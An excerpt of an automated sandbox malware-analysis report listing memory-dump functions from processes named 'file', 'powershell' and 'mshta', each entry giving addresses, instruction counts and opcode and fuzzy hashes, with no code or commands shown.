                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13f31c78d896a0260af55111ec9b1ad505c9c95db834a22bfca837f8d85a3b5d
                                                                    • Instruction ID: e982f0f9d11012894ed30c17820184fe728097a6a3979f9a5de9ac2225da9b4c
                                                                    • Opcode Fuzzy Hash: 13f31c78d896a0260af55111ec9b1ad505c9c95db834a22bfca837f8d85a3b5d
                                                                    • Instruction Fuzzy Hash: CEF0E533B084364FDB2CDA28CC954AD73D6EB55720B154629D886DB1E6DC14DC51DAC4
                                                                    Function 00007FFD340B0607 Relevance: .0, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bd4b82191518eb0c0fd80ecd27a782c0bcde65226c124ef3c2d93b1ad38f263
                                                                    • Instruction ID: 69f8d729be9ccfdb13c9d4e26c7e03abe6148a2904847f302002ee4997d0f409
                                                                    • Opcode Fuzzy Hash: 2bd4b82191518eb0c0fd80ecd27a782c0bcde65226c124ef3c2d93b1ad38f263
                                                                    • Instruction Fuzzy Hash: FBF04970F0820A8BDB44DFA8C6955FEB7F1EF89300F10852AD114E6280DB78AA40DB94
                                                                    Function 00007FFD340B26FD Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c87b182c4fac72f7fbcb1f4ceab3771b46ee6bab74c70f62ed3d54fcf4e47d5b
                                                                    • Instruction ID: da65b3909912385acbf6f33fb21e229199303fa782ccae3578d29eda282214ee
                                                                    • Opcode Fuzzy Hash: c87b182c4fac72f7fbcb1f4ceab3771b46ee6bab74c70f62ed3d54fcf4e47d5b
                                                                    • Instruction Fuzzy Hash: 89E0ED287882028B9209011404EB0747281EBA7600B30A13EDA2BCE2A9DCACE413B5DA
                                                                    Function 00007FFD340B2872 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9a5899ab3a237a68ab0b73736ed4e85e51b7d5ef856136ff59abbcde00f2f03
                                                                    • Instruction ID: 20b1f8c0395255f1a07f38d6154eadb06e6afb1671d2299aea4ac9bedfe83eef
                                                                    • Opcode Fuzzy Hash: f9a5899ab3a237a68ab0b73736ed4e85e51b7d5ef856136ff59abbcde00f2f03
                                                                    • Instruction Fuzzy Hash: 96E06D34718A4A8BE728EA18C095866B3E2FBD4304F20893DD58BC7758CE35F842D744
                                                                    Function 00007FFD340B2770 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 28f07b28477c5d037da743ea235d16925da64d7273dd0d7772c6753acaa9e107
                                                                    • Instruction ID: ef7bf14120dba41ab72f35dc9f66320464dbe852a4af0689a6c46c41ebb4f591
                                                                    • Opcode Fuzzy Hash: 28f07b28477c5d037da743ea235d16925da64d7273dd0d7772c6753acaa9e107
                                                                    • Instruction Fuzzy Hash: E3E08671B1C7018B821CCA2CC55642673E3FBD9700B10892DE58283348CE30FC019686
                                                                    Function 00007FFD340B0BEA Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84f27ac0eb510f187ac6268f50687ff810586a091346b14766070137dcef7988
                                                                    • Instruction ID: 21c02b20aa71612bce283436fe4a11f779adc03d0720f8ec7433e7e9c4be56fd
                                                                    • Opcode Fuzzy Hash: 84f27ac0eb510f187ac6268f50687ff810586a091346b14766070137dcef7988
                                                                    • Instruction Fuzzy Hash: F9E08C21B2C2024BE798EB3882B61BE33A2EB88200B90587EE00BC61D6DD3CE4065744
                                                                    Function 00007FFD340B236E Relevance: .0, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 491920ec3d3d624cb1a4f29c839e2d267b6454ce7d31ce4bd10af144ade3044f
                                                                    • Instruction ID: 428216db807d7909d8e6ed24d0d616c031047cc047379332920258dd3eec3025
                                                                    • Opcode Fuzzy Hash: 491920ec3d3d624cb1a4f29c839e2d267b6454ce7d31ce4bd10af144ade3044f
                                                                    • Instruction Fuzzy Hash: ADE01270B183118FE31CDE1D84A602677E2FFDA745B20853DE6C24A655CA7AF402E656
                                                                    Function 00007FFD340B24E7 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74c65772f74cb05967e9bf0e7e201c81fbbfe6903561c29925da52f23a48f947
                                                                    • Instruction ID: b38d69f71f0d824f1122a62d501a029466166e463f9a274f408200a332a3c8b7
                                                                    • Opcode Fuzzy Hash: 74c65772f74cb05967e9bf0e7e201c81fbbfe6903561c29925da52f23a48f947
                                                                    • Instruction Fuzzy Hash: C2D0123478DB0A4BC218915C55A213532D3EBDE310734943CA74FC7795CDADEC436549
                                                                    Function 00007FFD340B272C Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9ef9cd963aafc0c4b04c5580650554c964e552be0f5a1c2f9776bf55aa25af1
                                                                    • Instruction ID: 6393d38fee220fda5ddd7deec32cd504093579bcafb6a1b4b063c58f28874a96
                                                                    • Opcode Fuzzy Hash: f9ef9cd963aafc0c4b04c5580650554c964e552be0f5a1c2f9776bf55aa25af1
                                                                    • Instruction Fuzzy Hash: 94D0A7343046058F821496198481462B3D1FB94700B308438898BC7705CD38F512A7C1
                                                                    Function 00007FFD340B2F4F Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea5ce5abfc42c71400edc772d76bcd7f5c962e93277b31aea309b3f75d008fcd
                                                                    • Instruction ID: f3bfed03efa832cad272889731c4f982ce5e790b3223d004545a87908034e2fd
                                                                    • Opcode Fuzzy Hash: ea5ce5abfc42c71400edc772d76bcd7f5c962e93277b31aea309b3f75d008fcd
                                                                    • Instruction Fuzzy Hash: 4AC080327696058F927D552441760357246FF17105711653DC747D35D2CE7CBC03758D
                                                                    Function 00007FFD340B2F70 Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb851ee88e7f1c5be79d29609ab406b02921730e3b990c6ff0bf406a0e947ef1
                                                                    • Instruction ID: 84039c5be6ad45c58c1f09e4c25981d09b7c119a1f8ca016cc8aa99ae197a070
                                                                    • Opcode Fuzzy Hash: fb851ee88e7f1c5be79d29609ab406b02921730e3b990c6ff0bf406a0e947ef1
                                                                    • Instruction Fuzzy Hash: 6CC08031B1C5124BD62D552040710397167AB07201711503DCB8BD31C7CD69EC03B985

                                                                    Non-executed Functions

                                                                    Function 00007FFD340B42BB Relevance: .2, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 76e53358b36ece90a10bd5e1b02f05ee6dc5c3d7713b127ba50af5039f9d72e3
                                                                    • Instruction ID: 0985109228d4b15f0a75b3bac79dceb6b4b457121641697b51d578844a8211b7
                                                                    • Opcode Fuzzy Hash: 76e53358b36ece90a10bd5e1b02f05ee6dc5c3d7713b127ba50af5039f9d72e3
                                                                    • Instruction Fuzzy Hash: 3151E22160D7C60FD30B9A388C654617FA6DB8331071A82FFC596CB1E3DD6C991AD3A2
                                                                    Function 00007FFD340B48A3 Relevance: .2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b74f8785980529fe1c272d40dbe03c213aacf5dd3aca813185ec27f7fcb7306b
                                                                    • Instruction ID: 8d59ab1a31659dabef12fa1dbded15d3b2086e5e4876532700072dd185cccf55
                                                                    • Opcode Fuzzy Hash: b74f8785980529fe1c272d40dbe03c213aacf5dd3aca813185ec27f7fcb7306b
                                                                    • Instruction Fuzzy Hash: DF416C3070C3890FD30DDE784C554B67BA6EB87310B1582BED18AC75A7DD28A507C381
                                                                    Function 00007FFD340B2CEC Relevance: .2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6ac8d024370f2e2cfc202fa03c478a8498aaaf79270882e4d4d5d1443e7f66c2
                                                                    • Instruction ID: 73dbd9e2a0657c482bb0d510f2ce20734d1d7e2e1d025195e0b161e20b2c88d9
                                                                    • Opcode Fuzzy Hash: 6ac8d024370f2e2cfc202fa03c478a8498aaaf79270882e4d4d5d1443e7f66c2
                                                                    • Instruction Fuzzy Hash: 0451E13120EBC64FD70B9B3888B55A07FB0AF57314B1945EFC486CF1A7D928A84AD752
                                                                    Function 00007FFD340B53CA Relevance: .1, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c8dc0943a575074eccb4dd261464c723c9008f1d9fa9abe18df2b531ccc4dde
                                                                    • Instruction ID: 7e6228213eeb1de09e8af7f2ded4d52deaa9c77ba21fd2fa8a28c5937c44010d
                                                                    • Opcode Fuzzy Hash: 8c8dc0943a575074eccb4dd261464c723c9008f1d9fa9abe18df2b531ccc4dde
                                                                    • Instruction Fuzzy Hash: 22413362A0D3C50FD31E9B744CA55657FB5EB43304B1982EFD8C2CB1E3E968980AD392

                                                                    Executed Functions

                                                                    Function 00007FFD3417171A Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2338651328.00007FFD34170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34170000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12b9ea905b16a78c37e36c7d863946069a73b0d88b807ebc13bee7307cb5b4a5
                                                                    • Instruction ID: c73419a369398ec8db43091003983300a16c22b4704b6b5f63919588afb2c93a
                                                                    • Opcode Fuzzy Hash: 12b9ea905b16a78c37e36c7d863946069a73b0d88b807ebc13bee7307cb5b4a5
                                                                    • Instruction Fuzzy Hash: 1021F923F0DE8A0FE3E5A76C58A517476C3EFA6350B9940BAD10CC3293DD2DEC059241
                                                                    Function 00007FFD34170D1E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2338651328.00007FFD34170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34170000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6baddfc869e5142a03cc9c84142444f5b0226bf5306087f7b0d70c6702baf6bd
                                                                    • Instruction ID: c876b0cc9c3cc14a50c643aac9d2a8be9c335685bb71aef1f60ff33525fbc7bc
                                                                    • Opcode Fuzzy Hash: 6baddfc869e5142a03cc9c84142444f5b0226bf5306087f7b0d70c6702baf6bd
                                                                    • Instruction Fuzzy Hash: 07018423F0EF9A0FE7E6A66C58A51B899D1EF5A25174480BAE50DC31D3DD2DEC015340
                                                                    Function 00007FFD340A37B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2337813999.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd340a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b810c0910d0c383be203c592890fe595a75bf040a6519caf3d9f7ce2020acd1
                                                                    • Instruction ID: 3d4ddc66ec867c246395406e4cf6c1652eecb87c916e2a03799e970307de6762
                                                                    • Opcode Fuzzy Hash: 3b810c0910d0c383be203c592890fe595a75bf040a6519caf3d9f7ce2020acd1
                                                                    • Instruction Fuzzy Hash: 8501A77020CB0C4FDB84EF0CE051AA6B3E0FB89320F10052DE58AC3651D736E882CB41

                                                                    Executed Functions

                                                                    Function 00007FFD34170BBD Relevance: .2, Instructions: 248COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2301144725.00007FFD34170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ffd34170000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b2a5b8c406812dcaeba5a748cec355e92e092c1be33f2ae7eeb66abb770db77
                                                                    • Instruction ID: cca1e72c9e4d0aebba6d459c56c184841e7e1c46704298e05db7de6b388d3963
                                                                    • Opcode Fuzzy Hash: 8b2a5b8c406812dcaeba5a748cec355e92e092c1be33f2ae7eeb66abb770db77
                                                                    • Instruction Fuzzy Hash: 76610663A0EFC90FE7A697684CA55A67FE0DF67324B1841FBD188C7093D918AC46C352
                                                                    Function 00007FFD3417395E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2301144725.00007FFD34170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ffd34170000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2781ca945493b62e5b700e65f8f0a3d1db4cc88eae39ca39bc2b0ee49874bcc1
                                                                    • Instruction ID: ee54925f857148bfc1ed90a874dc8a684344a649a9c8f5718256c6fc5d8c8d90
                                                                    • Opcode Fuzzy Hash: 2781ca945493b62e5b700e65f8f0a3d1db4cc88eae39ca39bc2b0ee49874bcc1
                                                                    • Instruction Fuzzy Hash: 41110A33F0DA8D4FEB55DB9854A43A87BD2EF66310B0440BEC54CD7183DD29A801C351
                                                                    Function 00007FFD34170D1E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2301144725.00007FFD34170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ffd34170000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6baddfc869e5142a03cc9c84142444f5b0226bf5306087f7b0d70c6702baf6bd
                                                                    • Instruction ID: c876b0cc9c3cc14a50c643aac9d2a8be9c335685bb71aef1f60ff33525fbc7bc
                                                                    • Opcode Fuzzy Hash: 6baddfc869e5142a03cc9c84142444f5b0226bf5306087f7b0d70c6702baf6bd
                                                                    • Instruction Fuzzy Hash: 07018423F0EF9A0FE7E6A66C58A51B899D1EF5A25174480BAE50DC31D3DD2DEC015340
                                                                    Function 00007FFD340A37B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2299909818.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ffd340a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b810c0910d0c383be203c592890fe595a75bf040a6519caf3d9f7ce2020acd1
                                                                    • Instruction ID: 3d4ddc66ec867c246395406e4cf6c1652eecb87c916e2a03799e970307de6762
                                                                    • Opcode Fuzzy Hash: 3b810c0910d0c383be203c592890fe595a75bf040a6519caf3d9f7ce2020acd1
                                                                    • Instruction Fuzzy Hash: 8501A77020CB0C4FDB84EF0CE051AA6B3E0FB89320F10052DE58AC3651D736E882CB41
                                                                    Function 00007FFD34170E70 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2301144725.00007FFD34170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ffd34170000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: baada5f523083602779955db7c51430f4eecbae645923bec02f8158ce374ecae
                                                                    • Instruction ID: 9911375e763c9321459932a8c31830fb16a73a2256da0d4fc3ee75bdd170eeae
                                                                    • Opcode Fuzzy Hash: baada5f523083602779955db7c51430f4eecbae645923bec02f8158ce374ecae
                                                                    • Instruction Fuzzy Hash: 1D01FF2464E3C58FC75357784C302667FE89F43228B0800EAE0C8CA0A3C90C085AC396

                                                                    Executed Functions

                                                                    Function 000002AECD000F09 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F11 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F21 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F31 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F41 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F49 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F51 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F61 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
